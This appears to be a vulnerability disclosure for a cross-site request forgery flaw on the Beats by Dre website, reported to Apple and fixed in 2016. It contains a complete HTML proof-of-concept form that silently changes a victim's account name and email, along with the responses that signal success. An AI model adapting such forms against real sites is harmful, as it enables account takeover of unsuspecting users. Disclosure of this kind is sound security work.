Beats By Dre suffered from a cross site request forgery vulnerability.
2d3ccb9df19abcc28429634123e168d9e2ecdb52d40839bf2919ce9377d2a86d
Hello,
I am Aaditya Purani, and i had found an CSRF (Cross Site Request Forgery )
on Beats by Dr.Dre which could lead to full Account Takeover and
Information change by Just sending a Malicious crafted Link to the user.
Proof of Concept:
<html>
<!-- CSRF PoC - By Aaditya Purani -->
<body>
<form method='POST' action="
https://www.beatsbydre.com/on/demandware.store/Sites-beats-Site/en_US/GigyaRAAS-SaveCustomer
">
<input type="hidden" name="firstName" value="hacked" />
<input type="hidden" name="lastName" value="hackerone" />
<input type="hidden" name="emailAddress" value="victimsemail@gmail.com" /> <
input type="hidden" name="zip" value="" />
<input type="hidden" name="phone" value="" />
<input type="hidden" name="csrf_token" value="
VxM7k0ya2N1R69Ix9E3m/2165n60n2p399n38q6r1904o1po98r1snn323q0q/3Ex5Klu9mD1x5vMo91
" />
<input type="hidden" name="isEmailSubscription" value="true" />
<input type="hidden" name="isAlreadySubscribed" value="false" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Response :
{aisCustomerSavedSuccessfullya: true, aunsubscribeStatusa: null } -> Attack
Successful
{aisCustomerSavedSuccessfullya: false, aunsubscribeStatusa: null } ->
Attack Unsuccessful
Clicking on this Link, would change details of any User. I have wrote an
Complete Blog here:
https://aadityapurani.com/2016/07/20/how-i-hacked-your-beats-account-apple-bug-bounty/
Video PoC: https://youtu.be/2SfmmWxiDck
Apple has Acknowledged me in their Hall of fame:
https://support.apple.com/en-us/HT201536
*Timeline:*
October 8th 2015 a Reported
October 23th 2015 a Triaged
November 6th 2015 a Responded that aMatter is being investigateda
January 18th 2016 a Fixed
June 20th 2016 a Acknowledged